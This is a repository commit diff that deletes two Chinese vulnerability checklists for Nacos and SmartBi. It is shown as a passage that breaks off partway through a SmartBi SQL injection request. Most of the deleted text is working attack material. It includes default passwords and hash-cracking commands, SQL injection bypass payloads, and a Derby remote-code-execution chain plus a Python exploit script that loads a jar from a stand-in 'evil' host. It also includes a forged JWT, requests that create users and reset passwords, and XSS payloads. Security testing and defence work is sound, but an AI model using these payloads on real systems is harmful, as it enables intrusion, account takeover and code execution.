admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-04 18:27:48 +00:00
Code Issues Packages Projects Releases Wiki Activity

update

Browse Source
This commit is contained in:
Threekiii 2025-03-10 16:59:48 +08:00
parent f73d5f6046
commit 8eeaa32420
18 changed files with 55 additions and 1861 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

495
CHECKLIST/Nacos 漏洞 Checklist.md
View File

@ -1,495 +0,0 @@
# Nacos 漏洞 Checklist
## 一、前置知识
### 0x01 Nacos 概述
Nacos 是阿里巴巴推出来的一个新开源项目是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。
## 二、默认口令/弱口令
Nacos 默认帐户名密码:
```
nacos/nacos
```
数据库中的 bcrypt 加密存储示例:
```shell
# nacos
$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu
# Hello123
$2a$10$rT.ZmZTjj55Xs65yR9ZDdexuLITXfCXkifQv4KpLm7yVLtiBmUHgG
```
弱口令爆破 with hashcat
```shell
# nacos
echo -n '$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu' > hashes.txt
-----
hashcat -m 3200 -a 0 -o result.txt hashes.txt ~/HackTools/Dict/YOUR_DICT.txt --force
-----
cat result.txt
$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu:nacos
# Hello123
echo -n '$2a$10$rT.ZmZTjj55Xs65yR9ZDdexuLITXfCXkifQv4KpLm7yVLtiBmUHgG' > hashes.txt
hashcat -m 3200 -a 0 -o result.txt hashes.txt ~/HackTools/Dict/YOUR_DICT.txt --force
-----
cat result.txt
$2a$10$rT.ZmZTjj55Xs65yR9ZDdexuLITXfCXkifQv4KpLm7yVLtiBmUHgG:Hello123
```
弱口令爆破 with john the ripper
```shell
john --wordlist=~/HackTools/Dict/YOUR_DICT.txt hashes.txt
-----
john --show hashes.txt
?:Hello123
```
## 三、可能存在的未授权 API
### 0x01 用户信息 API
```
/nacos/v1/auth/users?pageNo=1&pageSize=9
```
### 0x02 集群信息 API
```
/nacos/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=
```
### 0x03 配置信息 API
```
/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=9&tenant=&search=accurate&accessToken=&username=
# or
/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=9&tenant=<IF_YOU_KNOW_SOME_TENANT>&search=accurate&accessToken=&username=
```
这一接口在未授权的情况下可能会暴露 Spring、MySQL、Redis、Druid 等配置信息,若存在云环境、文件系统,还可能暴露 accessKey、secretKey 等。
获取配置信息示例:
![image-20230609161347780](images/image-20230609161347780.png)
获取 ak、sk 示例:
![image-20230609161814152](images/image-20230609161814152.png)
如果返回为 403 Forbidden可以尝试 CNVD-2023674205 漏洞绕过限制。
## 四、 SQL 注入风险 CVE-2021-29442
### 漏洞描述
在使用 Derby 数据库作为内置数据源时Nacos config server 中有未鉴权接口 `/nacos/v1/cs/ops/derby`,执行 SQL 语句可以查看敏感数据,可以执行任意的 SELECT 查询语句。如果使用外置数据库(如 MySQL则该接口无法访问。
漏洞点位于 nacos-config 的 com.alibaba.nacos.config.server.controller.ConfigOpsController。
### 漏洞影响
```
Nacos 未鉴权且使用 Derby 数据库作为内置数据源
```
### 漏洞复现
poc
```
/nacos/v1/cs/ops/derby?sql=select+*+from+sys.systables
# or
/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st
```
一些查询语句:
```
select * from users
select * from permissions
select * from roles
select * from tenant_info
select * from tenant_capacity
select * from group_capacity
select * from config_tags_relation
select * from app_configdata_relation_pubs
select * from app_configdata_relation_subs
select * from app_list
select * from config_info_aggr
select * from config_info_tag
select * from config_info_beta
select * from his_config_info
select * from config_info
```
Bypass payload
```
/nacos/v1/cs/ops/derby?sql=SELECT--/dssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssad&sql=/%0a*--/%25&q=dssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssad%&sql=%0afrom--/&sql=/%0ausers
```
使用 Derby 数据库作为内置数据源,且目标系统未开启鉴权功能时,可调用该接口实现 RCE。[RCE payload](http://www.lvyyevd.cn/archives/derby-shu-ju-ku-ru-he-shi-xian-rce):
1. 创建一个 java 编译并打包成 jar放置在对应站点下
```
import java.io.IOException;
public class testShell4 {
public static void exec() throws IOException {
Runtime.getRuntime().exec("cmd.exe /c calc");
}
}
```
2. sql 语句部分如下:
```
# 导入一个类到数据库中
CALL SQLJ.INSTALL_JAR('http://127.0.0.1:8088/test.jar', 'APP.Sample4', 0)
# 将这个类加入到derby.database.classpath这个属性是动态的不需要重启数据库
CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath','APP.Sample4')
# 创建一个PROCEDUREEXTERNAL NAME 后面的值可以调用类的static类型方法
CREATE PROCEDURE SALES.TOTAL_REVENUES() PARAMETER STYLE JAVA READS SQL DATA LANGUAGE JAVA EXTERNAL NAME 'testShell4.exec'
# 调用PROCEDURE
CALL SALES.TOTAL_REVENUES()
```
另一个 [Exploit](https://github.com/vulhub/vulhub/tree/master/nacos/CVE-2021-29442):
```
package test.poc;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.io.StringWriter;
public class Example {
public static void main(String[] args) {
String ret = exec("ipconfig");
System.out.println(ret);
}
public static String exec(String cmd) {
StringBuffer bf = new StringBuffer();
try {
String charset = "utf-8";
String osName = System.getProperty("os.name");
if (osName != null && osName.startsWith("Windows"))
charset = "gbk";
Process p = Runtime.getRuntime().exec(cmd);
InputStream fis = p.getInputStream();
InputStreamReader isr = new InputStreamReader(fis, charset);
BufferedReader br = new BufferedReader(isr);
String line = null;
while ((line = br.readLine()) != null)
bf.append(line);
} catch (Exception e) {
StringWriter writer = new StringWriter();
PrintWriter printer = new PrintWriter(writer);
e.printStackTrace(printer);
try {
writer.close();
printer.close();
} catch (IOException iOException) {}
return "ERROR:" + writer.toString();
}
return bf.toString();
}
}
```
```
import random
import sys
import requests
from urllib.parse import urljoin
import argparse
def exploit(target, command, service):
removal_url = urljoin(target, '/nacos/v1/cs/ops/data/removal')
derby_url = urljoin(target, '/nacos/v1/cs/ops/derby')
for i in range(0, sys.maxsize):
id = ''.join(random.sample('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', 8))
post_sql = f"""CALL sqlj.install_jar('{service}', 'NACOS.{id}', 0)
CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath', 'NACOS.{id}')
CREATE FUNCTION S_EXAMPLE_{id}( PARAM VARCHAR(2000)) RETURNS VARCHAR(2000) PARAMETER STYLE JAVA NO SQL LANGUAGE JAVA EXTERNAL NAME 'test.poc.Example.exec'
"""
get_sql = f"select * from (select count(*) as b, S_EXAMPLE_{id}('{command}') as a from config_info) tmp"
files = {'file': post_sql}
post_resp = requests.post(url=removal_url, files=files)
post_json = post_resp.json()
if post_json.get('message', None) is None and post_json.get('data', None) is not None:
print(post_resp.text)
get_resp = requests.get(url=derby_url, params={'sql': get_sql})
print(get_resp.text)
break
def main():
parser = argparse.ArgumentParser(description='Exploit script for Nacos CVE-2021-29442')
parser.add_argument('-t', '--target', required=True, help='Target URL')
parser.add_argument('-c', '--command', required=True, help='Command to execute')
parser.add_argument('-s', '--service', required=True, help='Service URL')
args = parser.parse_args()
exploit(args.target, args.command, args.service)
if __name__ == '__main__':
main()
```
```
python poc.py -t http://your-ip:8848 -s http://evil/Nacos.jar -c "ps aux"
```
### 修复建议
- [关于Nacos Derby数据库运维接口/nacos/v1/cs/ops/derby相关问题公告](https://nacos-group.github.io/blog/announcement-derby-ops-api/?source=news/)
## 五、认证绕过/用户创建 CVE-2021-29441
### 漏洞描述
2020 年 12 月 29 日披露。在 Nacos 进行认证授权操作时,会判断请求的 User-Agent 是否为 ”Nacos-Server”如果是的话则不进行任何认证。该配置为硬编码通过该漏洞攻击者可以获取到用户名密码等敏感信息且可以进行任意操作包括创建新用户并进行登录后操作。
### 漏洞影响
```
Nacos <= 2.0.0-ALPHA.1
```
### 漏洞复现
访问 `/nacos/v1/auth/users?pageNo=1&pageSize=9` ,查看状态码是否为 200且内容中是否包含 `pageItems`。通过该路由可查询 IP 地址、Nacos 端口、Nacos 版本、raftPort 等信息:
```
http://your-ip:port/nacos/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=
```
通过 `/nacos/v1/auth/users` 路由查询已有的用户列表及敏感信息:
```
http://your-ip:port/nacos/v1/auth/users?pageNo=1&pageSize=9
```
![image-20230609142007526](images/image-20230609142007526.png)
此处需要注意,大部分企业的 Nacos 的 URL 为 `/v1/auth/users` ,而不是默认的 `/nacos/v1/auth/users`,即:
```
/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=
```
```
/v1/auth/users?pageNo=1&pageSize=9
```
尝试以 POST 方式创建新用户whoami/whoami
```
POST /v1/auth/users HTTP/1.1
username=whoami&password=whoami
```
![image-20230609143031183](images/image-20230609143031183.png)
查看刚才创建的新用户使用添加的新用户whoami/whoami进行登录
```
GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
```
![image-20230609143105272](images/image-20230609143105272.png)
HTTP Request Headers
```
User-Agent: Nacos-Server
```
### 修复建议
1. 修改 Nacos 的 application.properties 配置文件,开启服务身份识别功能,配置后访问 `/nacos/v1/auth/users/?pageNo=1&pageSize=9` 路由将返回 403 Forbidden。
```
# 开启鉴权
nacos.core.auth.enabled=true
nacos.core.auth.enable.userAgentAuthWhite=false
nacos.core.auth.server.identity.key=YOUR-KEY
nacos.core.auth.server.identity.value=YOUR-VALUE
```
2. Nacos 注册及配置中心开启权限认证,编辑项目中的 bootstrap.yml 或 bootstrap.properties修改 discovery 和 config 开启用户密码认证(用户名和密码不能带有 %、$ 等会被转义的特殊字符)。
## 六、secret.key 默认密钥 CNVD-2023674205
### 漏洞描述
2023 年 3 月 2 日披露。Alibaba Nacos 使用了固定的 secret.key 默认密钥,导致攻击者可以构造请求获取敏感信息,导致未授权访问漏洞。
### 漏洞影响
```
Alibaba Nacos <= 2.2.0
```
### 漏洞复现
在配置文件 conf/application.properties 中,默认硬编码 nacos.core.auth.plugin.nacos.token.secret.key 的值。
```
nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789
```
Nacos 使用 jwt token算法为 HS256将 secret.key 的默认值当作 secretKey生成 Signature。jwt token 的 Payload 为 subject用户名和 exp有效期
我们伪造一个 jwt tokenPayload
```
{
"sub": "nacos",
"exp": 1696669333
}
```
![image-20230609155053114](images/image-20230609155053114.png)
伪造的 jwt token
```
eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5OTg4ODc3N30.bYEColBVGkF-H-kGr9PxWnbmZZp66z77NXUNHXZbbnw
```
进行验证,没有配置 jwt token 时,返回 403 Forbidden
```
GET /v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=9&tenant=&search=accurate&accessToken=&username= HTTP/1.1
Host: your-ip
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5OTg4ODc3N30.bYEColBVGkF-H-kGr9PxWnbmZZp66z77NXUNHXZbbnw
```
![image-20230609155124566](images/image-20230609155124566.png)
修改 Authorization 头,配置 jwt token返回 200 OK
```
Authorization: Bearer <jwt token>
```
![image-20230609155215648](images/image-20230609155215648.png)
### 漏洞修复
1. 修改生成 Token 的 secret.key推荐自定义密钥时将配置项设置为 Base64 编码的字符串,且原始密钥长度不得低于 32 字符。
```
#启用认证
nacos.core.auth.enabled=true
#生成 Token 的密钥
nacos.core.auth.plugin.nacos.token.secret.key=base64编码
```
2. 升级到 2.2.0.1 及之后版本。Nacos 官方在 2023.03.02 发布了 2.2.0.1下载地址https://github.com/alibaba/nacos/releases/tag/2.2.0.1最新版本https://github.com/alibaba/nacos/releases。
## 七、identity.key/value 默认值认证绕过
### 漏洞描述
当开启 Nacos 权限认证nacos.core.auth.enabled=true配置文件中存在默认值
```
nacos.core.auth.server.identity.key=serverIdentity
nacos.core.auth.server.identity.value=security
```
该硬编码导致攻击者可以构造携带该 key 和 value 的请求,从而绕过权限认证。
### 漏洞影响
```
Nacos <= 2.2.0
```
### 漏洞复现
```
POST /v1/auth/users HTTP/1.1
serverIdentity: security
username=whoami&password=whoami
```
当开启 Nacos 权限认证nacos.core.auth.enabled=true必须填写 nacos.core.auth.server.identity.key 和 nacos.core.auth.server.identity.value 才能够正常启动。若 `serverIdentity: security` 无法绕过,可以尝试以下键值对:
```
官网示例中的键值对 example:example
```
```
搜索引擎解决方案中出现最多的键值对 test:test
```
### 漏洞修复
1. 配置自定义身份识别的 key不可为空和 value不可为空
```
nacos.core.auth.server.identity.key=example
nacos.core.auth.server.identity.value=example
```
2. 升级最新版本https://github.com/alibaba/nacos/releases。
## 八、Nacos 集群 Raft 反序列化漏洞
### 漏洞描述
Nacos 在处理某些基于 Jraft 的请求时,采用 Hessian 进行反序列化但并未设置限制导致应用存在远程代码执行RCE漏洞。
### 漏洞影响
```
1.4.0 <= Nacos < 1.4.6 使用cluster集群模式运行
2.0.0 <= Nacos < 2.2.3 任意模式启动
```
Nacos 1.x 在单机模式下默认不开放 7848 端口故该情况通常不受此漏洞影响。Nacos 2.x 版本无论单机或集群模式均默认开放 7848 端口。
### 漏洞复现
exp
- https://github.com/c0olw/NacosRce/
### 漏洞修复
#### 通用修补建议
目前官方已发布安全修复更新,受影响用户可以升级到 Nacos 1.4.6、Nacos 2.2.3
- https://github.com/alibaba/nacos/releases/tag/1.4.6
- https://github.com/alibaba/nacos/releases/tag/2.2.3
#### 临时修补建议
对外限制开放 7848 端口,一般使用时该端口为 Nacos 集群间 Raft 协议的通信端口,不承载客户端请求,因此老版本可以通过禁止该端口来自 Nacos 集群外的请求达到止血目的(如部署时已进行限制或未暴露,则风险可控)。

493
CHECKLIST/SmartBi 漏洞 Checklist.md
View File

@ -1,493 +0,0 @@
# SmartBi 漏洞 Checklist
## 一、前置知识
### 0x01 SmartBi 概述
Smartbi 是企业级商业智能和大数据分析平台满足用户在企业级报表、数据可视化分析、自助分析平台、数据挖掘建模、AI 智能分析等大数据分析需求。该软件应用范围较广,据官网介绍,在全球财富 500 强的 10 家国内银行,有 8 家选用了 Smartbi。
### 0x02 FOFA指纹
```
app="SMARTBI"
```
### 0x03 登录入口
```
https://127.0.0.1/vision/mobileportal.jsp
https://127.0.0.1/vision/mobileX/login
https://127.0.0.1/vision/index.jsp
https://127.0.0.1/smartbi/vision/index.jsp
```
密码正确的情况下部分平台无法登陆此时设置user-agent为手机端就可以。
### 0x04 常见口令
```
demo/demo
manager/demo
admin/admin
admin/manager
admin/2manager
```
## 二、认证漏洞
### 0x01 登录爆破
```
POST /vision/RMIServlet HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; PRA-LX3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1/vision/mobileX/login
content-type: application/x-www-form-urlencoded
Content-Length: 70
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: JSESSIONID=1DA1DAA51469E646F97AD829F29A2B15
className=UserService&methodName=login&params=["admin","admin"]
```
抓取 true/false 字段。
### 0x02 401认证弱口令
/vision 目录下的文件都需要 401 认证:
```
admin/admin
admin/manager
admin/2manager
mining/admin
demo/demo
manager/demo
manager/admin
user/admin
test/admin
huanan/admin
```
不论用户名输什么,只要密码正确即可。
## 三、信息泄露
### 0x01 敏感信息
#### 查看版本
```
https://127.0.0.1/vision/version.txt
```
```
https://127.0.0.1/vision/packageinfo.txt
```
#### 目录遍历
```
https://127.0.0.1/vision/chooser.jsp?key=CONFIG_FILE_DIR&root=%2F
```
#### 信息泄露
```
https://127.0.0.1/vision/monitor/sysprops.jsp
```
```
https://127.0.0.1/vision/monitor/getclassurl.jsp?classname=smartbi.freequery.expression.ast.TextNode
```
```
https://127.0.0.1/vision/monitor/hardwareinfo.jsp
```
#### 接口泄露
直接访问 wsdl 无需 401
```
https://127.0.0.1/vision/listwsdl.jsp
```
提供资源目录树的访问功能:
```
https://127.0.0.1/vision/services/CatalogService?wsdl
```
SimpleReportService 提供灵活报表相关操作功能:
```
https://127.0.0.1/vision/services/SimpleReportService?wsdl
```
BusinessViewService 提供数据集定义相关操作功能:
```
https://127.0.0.1/vision/services/BusinessViewService?wsdl
```
DataSourceService 提供数据源相关操作功能:
```
https://127.0.0.1/vision/services/DataSourceService?wsdl
```
AnalysisReportService 提供多维分析相关操作功能:
```
https://127.0.0.1/vision/services/AnalysisReportService?wsdl
```
UserManagerService 提供用户相关操作,包括读取/维护用户信息、读取/维护组信息、读取/维护角色信息、为用户和组分配角色等:
```
https://127.0.0.1/vision/services/UserManagerService?wsdl
```
### 0x02 Session劫持
可重置用户密码,且无需原密码。
```
https://127.0.0.1/vision/monitor/listsessions.jsp
```
![image-20230717111349311](images/image-20230717111349311.png)
理论上重置成功,返回为 true但是实际测试过程中修改后的密码既不是改之前的密码也不是修改后的密码过一段时间自动重置为原来的密码。
```
POST /vision/RMIServlet HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1/vision/index.jsp
If-Modified-Since: 0
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 148
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: JSESSIONID=848B4743452D02C5A53FECCA58C47299
className=UserService&methodName=updateUserForChange&params=["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","zhongguo1","null","QWEqwe123",true]
```
```
POST /vision/RMIServlet HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1/vision/index.jsp
If-Modified-Since: 0
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 133
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: JSESSIONID=848B4743452D02C5A53FECCA58C47299
className=UserService&methodName=addUserAttribute&params=["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","SYSTEM_user_isEdit","0",null]
```
其中I8a94ca4e0175ab4aab4aaae90175d3e824c66a87为用户的id字段唯一身份标识。
### 0x03 Heapdump泄露
```
https://127.0.0.1/vision/monitor/heapdump.jsp
```
```
https://127.0.0.1/vision/monitor/heapdump.jsp?dumpbin=true
```
### 0x04 反射型/存储型XSS
```
https://127.0.0.1/vision/chooser.jsp?key=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E&root=/u01/data/domains/app_domain
```
```
https://127.0.0.1/vision/monitor/testmailserver.jsp?host=mail.longtop.com&user=111%22%3E%3Cimg%20src=x%20onerror=prompt(0)%3E&pass=123456
```
登录后个人参数位置,加密后传参可导致存储型 xss。
### 0x05 SSRF
探测出口ip
```
https://127.0.0.1/vision/monitor/testmailserver.jsp
```
## 四、SQL注入
需要登录,任意报表功能,例如:
```
https://127.0.0.1/vision/ssreportServlet
```
```
POST /vision/ssreportServlet HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1/vision/openresource.jsp?iPad=true&refresh=true&showtoolbar=false&showPath=false&resid=I40281d81016a8bc28bc20231016aaee007b230ac&_timestamp=1610433924926
Content-Type: application/x-www-form-urlencoded
Content-Length: 3293
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: FQPassword=; JSESSIONID=4BB550BF10C606619B753D3CE52CD3AB
Upgrade-Insecure-Requests: 1
sheetIndex=0&resid=I40281d81016a8bc28bc20231016aaee007b230ac&clientId=Iff8080810176f0c7f0c7544f0176f54eb72c1160&refreshType=refresh&paramsInfoEncode=encode=/JV/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aJ/'T/mJ/aK/VT/'T/aJ/m7/'T/a9/O9/V7/uu/ut/uu6(dp/uu/NO/uu/aJ/'T/mJ/aK/VT/'T/aJ/m7/'T/a9/O9/V7/uu/ut/uu(SR(D/uu/NO/uu/aJ/'T/mJ/aK/VT/'T/aJ/m7/'T/a9/O9/V7/uu/ut/uug(SQp/uu/NO/uun111/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uun111/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/'m/'7/aJ/V1/ma/aM/mt/VO/aM/ma/'K/uu/ut/uu6(dp/uu/NO/uu/aM/'m/'7/aJ/V1/ma/aM/mt/VO/aM/ma/'K/uu/ut/uu(SR(D/uu/NO/uu/aM/'m/'7/aJ/V1/ma/aM/mt/VO/aM/ma/'K/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/'m/'7/aJ/mt/O'/a9/mt/'1/aK/VV/VT/uu/ut/uu6(dp/uu/NO/uu/aM/'m/'7/aJ/mt/O'/a9/mt/'1/aK/VV/VT/uu/ut/uu(SR(D/uu/NO/uu/aM/'m/'7/aJ/mt/O'/a9/mt/'1/aK/VV/VT/uu/ut/uug(SQp/uu/NO/uuKK7777/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/aJ/Vm/Vx/aK/V'/mt/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/'m/'7/aJ/mt/O'/aJ/mt/V7/aJ/V'/'u/uu/ut/uu6(dp/uu/NO/uu/aM/'m/'7/aJ/mt/O'/aJ/mt/V7/aJ/V'/'u/uu/ut/uu(SR(D/uu/NO/uu/aM/'m/'7/aJ/mt/O'/aJ/mt/V7/aJ/V'/'u/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/aJ/'J/O'/am/'N/O'/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/'m/'7/aJ/mt/O'/aJ/'t/VO/aJ/'a/Vx/uu/ut/uu6(dp/uu/NO/uu/aM/'m/'7/aJ/mt/O'/aJ/'t/VO/aJ/'a/Vx/uu/ut/uu(SR(D/uu/NO/uu/aM/'m/'7/aJ/mt/O'/aJ/'t/VO/aJ/'a/Vx/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/aJ/'J/O'/am/'N/O'/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~MqRh/uu/ut/uu6(dp/uu/NO/uuRh/uu/ut/uu(SR(D/uu/NO/uu/aM/ON/'7/aM/VJ/'V/aM/mt/VO/aM/ma/'KRh/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uu6(dp/uu/NO/uu/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uu(SR(D/uu/NO/uu/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uu6(dp/uu/NO/uu/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uu(SR(D/uu/NO/uu/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uu6(dp/uu/NO/uu/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uu(SR(D/uu/NO/uu/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uu6(dp/uu/NO/uu/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uu(SR(D/uu/NO/uu/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/JT&pageId=0&writeBackData=&exportSheetIndexes=&exportId=&op=%7B%22getTotalPages%22%3Atrue%2C%22sheetPageCounts%22%3A%5B1%5D%7D
```
#### 0x01 解码并修改数据包直接注入
修改 paramsInfoEncode 为 paramsInfo将 Encode 参数去掉以下payload 可直接使用):
```
POST /vision/ssreportServlet HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1/vision/openresource.jsp?iPad=true&refresh=true&showtoolbar=false&showPath=false&resid=I40281d81016a8bc28bc20231016aaee007b230ac&_timestamp=1610433924926
Content-Type: application/x-www-form-urlencoded
Content-Length: 3282
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: FQPassword=; JSESSIONID=4BB550BF10C606619B753D3CE52CD3AB
Upgrade-Insecure-Requests: 1
